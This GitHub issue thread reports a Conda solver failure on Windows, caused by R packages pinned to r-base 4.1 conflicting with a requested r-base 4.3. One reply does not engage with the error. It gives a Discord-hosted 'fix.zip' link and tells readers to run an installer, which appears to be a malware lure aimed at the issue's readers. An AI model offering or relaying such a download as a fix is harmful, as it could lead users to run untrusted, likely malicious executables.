### ISSUE TITLE
Compatibility issues when resolving environment on Windows

### ISSUE THREAD

**Issue by ViHoller** [thanadol-git/CB2110#5]
Conda fails with following error message on Windows using both Anaconda and Miniconda:

LibMambaUnsatisfiableError: Encountered problems while solving:
  - package r-readxl-1.4.2-r41h1c2d66b_0 requires r-base >=4.1,<4.2.0a0, but none of the providers can be installed
  - nothing provides r-base >=4.2,<4.3.0a0 needed by r-ggplot2-3.5.1-r42hc72bb7e_0

Could not solve for environment specs
The following packages are incompatible
├─ r-base 4.3**  is requested and can be installed;
├─ r-ggplot2 3.5.1**  is installable with the potential options
│  ├─ r-ggplot2 3.5.1 would require
│  │  └─ r-base >=4.2,<4.3.0a0 , which does not exist (perhaps a missing channel);
│  ├─ r-ggplot2 3.5.1 would require
│  │  └─ r-base >=4.3,<4.4.0a0 , which can be installed;
│  └─ r-ggplot2 3.5.1 would require
│     └─ r-base >=4.4,<4.5.0a0 , which can be installed;
├─ r-readxl 1.4.2**  is not installable because it requires
│  └─ r-base >=4.1,<4.2.0a0 , which conflicts with any installable versions previously reported;
└─ r-reticulate 1.37.0**  is not installable because it requires
   └─ r-base >=4.1,<4.2.0a0 , which conflicts with any installable versions previously reported.

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by thanadol-git** [comment]
We will check.
